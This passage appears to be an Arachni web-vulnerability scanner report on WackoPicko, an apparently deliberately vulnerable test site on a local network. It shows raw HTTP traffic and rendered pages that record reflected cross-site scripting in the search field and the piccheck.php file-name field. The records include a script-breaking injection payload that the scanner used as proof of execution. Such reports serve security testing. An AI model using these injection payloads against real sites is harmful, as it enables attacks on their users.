          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="&lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt;"/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
'</h2>

   <div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
      <h3 class="error">No pictures here...</h3>


</ul>
</div>

</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST">
  <input type="hidden" name="MAX_FILE_SIZE" value="30000">
  </input>
  Check this file:
  <input name="userfile" type="file">
  </input>
  <br>
  </br>
  With this name:
  <input name="name" type="text">
  </input>
  <br>
  </br>
  <br>
  </br>
  <input type="submit" value="Send File">
  </input>
  <br>
  </br>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/piccheck.php
MAX_FILE_SIZE
30000
userfile
name
MAX_FILE_SIZE
30000
userfile
arachni_user
name
</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 0.643234 load page
URL http://192.168.0.26/WackoPicko/piccheck.php
1 0.100679 request http://192.168.0.26/WackoPicko/piccheck.php
2 0.108976 request http://192.168.0.26/WackoPicko/css/stylings.php

Execution-flow sinks

Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.

# Data
0

No helper data logged.

Inspect

HTTP request

Raw HTTP request used to retrieve the page.


    
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 930
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Checking your file </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</h2>
  <p>
    File is O.K. to upload!
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Checking your file 
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</h2>
  <p>
    File is O.K. to upload!
  </p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Checking your file </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</h2>
  <p>
    File is O.K. to upload!
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 3.950414 load page
URL http://192.168.0.26/WackoPicko/
1 2.996451 request http://192.168.0.26/WackoPicko/
2 0.337047 request http://192.168.0.26/WackoPicko/css/stylings.php

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Accept-Language: en-CA,*

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
